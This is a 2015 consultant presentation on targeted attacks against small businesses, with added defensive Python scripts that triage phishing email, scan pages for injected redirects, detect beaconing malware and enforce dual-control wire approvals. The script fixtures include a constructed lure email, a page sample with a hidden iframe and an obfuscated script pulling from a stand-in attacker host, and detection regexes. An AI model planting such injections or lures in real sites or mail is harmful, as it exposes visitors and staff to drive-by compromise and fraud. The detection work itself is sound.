TARGETED ATTACKS AND THE SMALL BUSINESS
Stephen Ferrero, Consultant, Xantrion
Dec 16, 2015
Xantrion
• Founded in 2000 by Anne Bisagno and Tom Snyder
• Wanted to bring big-company IT to small and midsized organizations
• Among the top 50 worldwide MSPs (1)
• 45-person technical team
• 70 core clients
• 3000 end users supported
• 600 servers managed
(1) MSP Mentor worldwide survey results.
Agenda
• The current SMB security paradigm
• Why we need to evolve our thinking
• Targeted attack methods
• The new SMB security paradigm
Typical security layers (diagram)
Hardware Firewall
Antivirus / Antimalware
OS Security Patches
User Rights Assignment
Email Filter / Web Filter
Policies and Awareness
User
More targeted attacks on SMBs
• Attackers have more and better resources
• SMBs are typically less secure
• SMBs make good launch points for attacks on the larger organizations they do business with
Spear Phishing
1. Attacker collects data about the victim, perhaps "friending" them on social networking sites
2. Attacker looks for possible themes to leverage against the victim
3. Attacker crafts a highly customized email with a malware-laced attachment and sends it to the victim
4. Victim opens the highly realistic email and launches the attachment
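The four steps above produce a message with recognizable traits: a sender on a look-alike domain, a display name borrowed from someone inside the company, an attachment type that can run code, and pressure to act now. The script below, an added example and not part of the presentation, triages a raw message for those indicators. The sample lure, the internal domain example-corp.com, the look-alike example-corp.co and the staff name list are all constructed for illustration.

```python
"""Triage an inbound message for spear-phishing indicators.

Added example, not code from the presentation. The message, the internal
domain example-corp.com, the look-alike example-corp.co and the name list
are all constructed for illustration.
"""
import email
import email.policy
import os
from email.utils import parseaddr

# Attachment types that commonly carry macro, script or executable payloads.
RISKY_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".hta", ".jar",
                    ".docm", ".xlsm", ".pptm", ".zip"}

# Pressure words that targeted lures lean on to stop the recipient thinking.
URGENCY_WORDS = {"urgent", "asap", "immediately", "wire", "this afternoon", "today"}


def levenshtein(a, b):
    """Edit distance, used to spot look-alike domains (examp1e vs example)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(domain, internal):
    """True when domain is not ours but within two edits of it
    (same label under another TLD, a dropped letter, a swapped character)."""
    if domain == internal:
        return False
    return (levenshtein(domain.split(".")[0], internal.split(".")[0]) <= 2
            or levenshtein(domain, internal) <= 2)


def body_text(msg):
    body = msg.get_body(preferencelist=("plain",))
    return body.get_content() if body is not None else ""


def triage(raw, internal_domain, staff_names):
    """Return a list of findings for one raw RFC 822 message (empty = no indicators)."""
    msg = email.message_from_string(raw, policy=email.policy.default)
    findings = []
    display, addr = parseaddr(str(msg.get("From", "")))
    sender_domain = addr.rpartition("@")[2].lower()

    # 1. Look-alike sender domain (the attacker researched the target, then spoofed it).
    if sender_domain and lookalike(sender_domain, internal_domain):
        findings.append(f"look-alike sender domain: {sender_domain}")

    # 2. Display name borrows an insider's name while the address is external.
    if sender_domain != internal_domain and any(n in display.lower() for n in staff_names):
        findings.append(f"display name impersonates staff: {display}")

    # 3. Attachment of a type that can execute code when opened.
    for part in msg.iter_attachments():
        fname = (part.get_filename() or "").lower()
        if os.path.splitext(fname)[1] in RISKY_EXTENSIONS:
            findings.append(f"risky attachment: {fname}")

    # 4. Urgency cues in subject or body.
    text = (str(msg.get("Subject", "")) + " " + body_text(msg)).lower()
    hits = sorted(w for w in URGENCY_WORDS if w in text)
    if hits:
        findings.append("urgency cues: " + ", ".join(hits))
    return findings


# Constructed lure: a "CFO" on a look-alike domain sends a macro document.
SAMPLE_LURE = """\
From: "Jane Doe (CFO)" <jane.doe@example-corp.co>
To: bob@example-corp.com
Subject: Re: Q4 vendor invoice - urgent
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Bob, per our chat on LinkedIn last week, please review the attached invoice
before the wire goes out this afternoon.

--b1
Content-Type: application/octet-stream; name="Invoice_Q4.docm"
Content-Disposition: attachment; filename="Invoice_Q4.docm"
Content-Transfer-Encoding: base64

AAAA
--b1--
"""

# Constructed benign message from a colleague.
SAMPLE_BENIGN = """\
From: Bob Smith <bob@example-corp.com>
To: alice@example-corp.com
Subject: Lunch?
Content-Type: text/plain

Want to grab lunch on Friday?
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LURE, "example-corp.com", {"jane doe"}):
        print("LURE:", f)
    print("BENIGN:", triage(SAMPLE_BENIGN, "example-corp.com", {"jane doe"}))
```

None of these indicators is proof on its own; the value is in the combination, and a mail filter that quarantines on two or more of them catches the lure while letting a colleague's plain-text note through.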
Water Hole Attack
1. Attacker collects data about the victim and the kind of websites they visit
2. Attacker looks for vulnerabilities in these websites
3. Attacker injects JavaScript or HTML that redirects to a separate site hosting exploit code
4. The compromised site waits for unsuspecting victims
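Step 3 leaves a trace in the page itself: a hidden iframe or a script that writes one, pointing off-site. The scanner below is an added example, not code from the presentation; it walks a page's HTML and flags hidden frames and script sources on hosts other than the site's own, plus inline scripts that stamp in a redirect. The sample page, the site host www.example-assoc.org and the attacker host cdn-stat.example.net are constructed.

```python
"""Scan a page's HTML for the injected redirect that a water hole attack plants.

Added example, not code from the presentation. The page, the site host
www.example-assoc.org and the attacker host cdn-stat.example.net are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script patterns used to stamp a redirect or hidden frame into a page.
REDIRECT_RE = re.compile(
    r"(?:window|document|top|self)\.location(?:\.href)?\s*=|"
    r"document\.write\s*\(\s*unescape|eval\s*\(\s*(?:unescape|atob)",
    re.IGNORECASE,
)


def _hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


class InjectionScanner(HTMLParser):
    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        # The site's own host plus any CDN or analytics hosts it legitimately uses.
        self.allowed = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
        self.findings = []
        self._in_script = False

    def _external(self, url):
        host = urlparse(url).hostname
        return host is not None and host.lower() not in self.allowed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe" and self._external(a.get("src", "")) and _hidden(a):
            self.findings.append(f"hidden iframe to {urlparse(a['src']).hostname}")
        elif tag == "script":
            self._in_script = True
            if self._external(a.get("src", "")):
                self.findings.append(f"external script from {urlparse(a['src']).hostname}")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands over <script> bodies verbatim, so inspect them here.
        if self._in_script and REDIRECT_RE.search(data):
            self.findings.append("inline script writes a redirect/hidden frame")


def scan(html, site_host, allowed_hosts=()):
    """Return findings for one page; an empty list means nothing suspicious."""
    s = InjectionScanner(site_host, allowed_hosts)
    s.feed(html)
    s.close()
    return s.findings


# Constructed copy of a trade-association page after an attacker edited it.
SAMPLE_PAGE = """<html><head><title>Example Trade Association</title>
<script src="https://www.example-assoc.org/js/app.js"></script>
</head><body>
<h1>Member news</h1>
<p>Annual meeting dates announced.</p>
<iframe src="https://cdn-stat.example.net/t.php" width="0" height="0" style="display: none"></iframe>
<script>document.write(unescape("%3Ciframe src=%22https://cdn-stat.example.net/go%22%3E%3C/iframe%3E"));</script>
</body></html>
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_PAGE, "www.example-assoc.org"):
        print(f)
```

Run it against a saved copy of each page on the sites your staff visit most, pass the site's real CDN and analytics hosts in `allowed_hosts` to keep the noise down, and diff the findings over time; a new off-site frame appearing on a page that has not otherwise changed is exactly what step 3 looks like from the outside.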
Process of a Typical Attack
1. Attacker delivers custom malware to the victim
2. Victim opens the attachment; custom malware is installed
3. Malware phones home and pulls down additional malware
4. Attacker establishes multiple re-entry points
5. Attacker continues to attempt privilege escalation and reconnaissance
6. Attacker achieves goal and exits
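Step 3, the malware phoning home, is the point in this sequence that an SMB can most cheaply observe: a scheduled check-in produces connections at nearly constant intervals, which human browsing never does. The detector below is an added example, not code from the presentation; it groups outbound connections by source and destination and flags pairs whose inter-connection gaps have a very low coefficient of variation. The log lines (timestamp, source IP, destination IP) and the addresses are constructed.

```python
"""Flag hosts that "phone home" on a fixed interval, from proxy/firewall logs.

Added example, not code from the presentation. The log lines (timestamp,
source IP, destination IP) and the addresses are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log: 10.0.0.15 beacons to 203.0.113.7 roughly every five minutes;
# 10.0.0.22 browses 198.51.100.10 at irregular, human intervals.
LOG = """\
2015-12-16T09:00:02 10.0.0.15 203.0.113.7
2015-12-16T09:00:10 10.0.0.22 198.51.100.10
2015-12-16T09:00:45 10.0.0.22 198.51.100.10
2015-12-16T09:05:03 10.0.0.15 203.0.113.7
2015-12-16T09:07:30 10.0.0.22 198.51.100.10
2015-12-16T09:08:00 10.0.0.22 198.51.100.10
2015-12-16T09:10:01 10.0.0.15 203.0.113.7
2015-12-16T09:12:00 10.0.0.15 198.51.100.10
2015-12-16T09:15:04 10.0.0.15 203.0.113.7
2015-12-16T09:20:02 10.0.0.15 203.0.113.7
2015-12-16T09:25:03 10.0.0.15 203.0.113.7
2015-12-16T09:30:02 10.0.0.15 203.0.113.7
2015-12-16T09:31:15 10.0.0.22 198.51.100.10
2015-12-16T09:31:20 10.0.0.22 198.51.100.10
2015-12-16T09:58:00 10.0.0.22 198.51.100.10
"""


def parse(log):
    """Yield (timestamp, src, dst) for each non-blank line."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        yield datetime.fromisoformat(ts), src, dst


def find_beacons(log, min_events=6, max_cv=0.1):
    """Return (src, dst, mean_gap_seconds, cv) for pairs whose inter-connection
    gaps are nearly constant: coefficient of variation (stdev/mean) <= max_cv."""
    times = defaultdict(list)
    for ts, src, dst in parse(log):
        times[(src, dst)].append(ts)
    hits = []
    for (src, dst), stamps in sorted(times.items()):
        if len(stamps) < min_events:
            continue  # too few samples to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        m = mean(gaps)
        if m <= 0:
            continue  # duplicate timestamps only; nothing to measure
        cv = pstdev(gaps) / m
        if cv <= max_cv:
            hits.append((src, dst, round(m), round(cv, 3)))
    return hits


if __name__ == "__main__":
    for src, dst, gap, cv in find_beacons(LOG):
        print(f"{src} -> {dst}: every ~{gap}s (cv={cv})")
```

Real implants add jitter to their sleep, so `max_cv` is a tuning knob rather than a constant: widen it and raise `min_events` when running over a full day of logs, and exclude known update and monitoring services, which beacon legitimately.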
(Diagram: the same layers, Hardware Firewall, Antivirus / Antimalware, OS Security Patches, User Rights Assignment, Email Filter / Web Filter, with spear phishing, waterholing, etc. passing through them to reach the User)
Typical SMB security layers (diagram repeated: Hardware Firewall, Antivirus / Antimalware, OS Security Patches, User Rights Assignment, Email Filter / Web Filter, Policies and Awareness, User)
Add more layers
• Educate employees
• Review hiring and firing policies
• Aggressive patching of OS and apps
  • Acrobat, Flash, QuickTime, Java
• Get off end-of-life software
  • Windows XP and Office 2003: end of support April 2014
Additional security layers (diagram)
Hardware Firewall
Antivirus / Antimalware
OS Security Patches
App Security Patches
User Rights Assignment
Email Filter / Web Filter
HR and Security Policies
User Awareness and Training
User
Identify your valuable assets
• Customer data
• Customer relationships
• Intellectual property
• Bank account info
Identify your special risks
• Internal threats
• Liability
• Unmanaged mobile devices
• Physical security
Practice secure banking
• Use two-factor authentication
• Require "dual control" or separation of duties
• Require that one control be completed on a dedicated PC
• Require out-of-band confirmation from your bank for large transactions
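The four banking controls above are easy to state and easy to get subtly wrong in practice, for example by letting one person approve twice from two machines. The check below is an added example, not code from the presentation; it encodes the controls as a single authorization function that reports every unmet control rather than stopping at the first. The threshold, the workstation name fin-pay-01 and the user names are assumed for illustration.

```python
"""Encode the dual-control banking rules as an authorization check.

Added example, not code from the presentation. The threshold, the host
name fin-pay-01 and the user names are assumed for illustration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Approval:
    user: str
    host: str            # workstation the approval was entered from
    second_factor: bool  # the approver's second factor was verified


@dataclass(frozen=True)
class WireRequest:
    requester: str
    amount: float
    approvals: tuple


POLICY = {
    "dedicated_hosts": {"fin-pay-01"},  # hardened PC used only for banking
    "large_amount": 10_000.00,          # at or above this, call the bank back
}


def authorize(req, bank_confirmed_oob=False, policy=POLICY):
    """Return (allowed, reasons); every unmet control is listed, not just the first."""
    reasons = []
    approvers = {a.user for a in req.approvals}
    if any(not a.second_factor for a in req.approvals):
        reasons.append("two-factor: every approval needs a verified second factor")
    if len(approvers) < 2:
        # Distinct people, not distinct approvals: one user from two PCs is still one user.
        reasons.append("dual control: two distinct approvers required")
    if req.requester in approvers:
        reasons.append("separation of duties: requester may not approve")
    if not any(a.host in policy["dedicated_hosts"] for a in req.approvals):
        reasons.append("dedicated PC: at least one approval must come from the banking workstation")
    if req.amount >= policy["large_amount"] and not bank_confirmed_oob:
        reasons.append("out-of-band: large transfer needs bank call-back")
    return (not reasons, reasons)


# Constructed scenarios.
GOOD = WireRequest("clerk", 25_000, (
    Approval("controller", "fin-pay-01", True),
    Approval("cfo", "cfo-laptop", True),
))
SELF_APPROVED = WireRequest("clerk", 4_000, (
    Approval("clerk", "fin-pay-01", True),
    Approval("clerk", "clerk-laptop", True),  # same person, different PC
))

if __name__ == "__main__":
    print(authorize(GOOD, bank_confirmed_oob=True))
    print(authorize(SELF_APPROVED))
```

The point of returning all reasons is auditability: the finance lead sees at a glance which control was skipped, and the check cannot be satisfied by a single compromised account, a single compromised workstation, or a single phone call.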
Protect mobile devices
• Be aware of the increase in mobile malware
• Stream data to mobile devices instead of storing it there
• Separate personal and work data
• Track devices
• Have remote-wipe capability
• Enforce password policies
Regularly re-evaluate your security
• Use the SANS Top 20 Critical Security Controls as a framework for frequent security policy updates (www.sans.org)
• Remind users of proper security best practices
References
cybersecurity. (n.d.). In Merriam-Webster's online dictionary. Retrieved from http://www.Merriam-webster.com/dictionary/cybersecurity
Small and midsize businesses. (n.d.). In Gartner IT Glossary. Retrieved from http://www.gartner.com/it-glossary/smbs-small-and-midsize-businesses/
Symantec Inc. (2013, April). Internet Security Threat Report. Retrieved from http://www.symantec.com/security_response/publications/threatreport.jsp
Verizon. (2012). Data Breach Investigations Report. Retrieved from http://www.verizonenterprise.com/products/security/dbir/
Mandiant. (2013). M-Trends 2013: Attack the Security Gap. Retrieved from https://www.mandiant.com/resources/m-trends/
Top 10 Threat Actions (from the Verizon 2012 Data Breach Investigations Report, listed in the references)
1. Keylogger / form-grabber / spyware
2. Exploitation of default or guessable passwords
3. Use of stolen login credentials
4. Send data to external site/entity
5. Brute force and dictionary attacks
6. Backdoor (allows remote access / control)
7. Exploitation of backdoor or C&C channel
8. Disable or interfere with security controls
9. Tampering
10. Exploitation of insufficient authentication (no login required)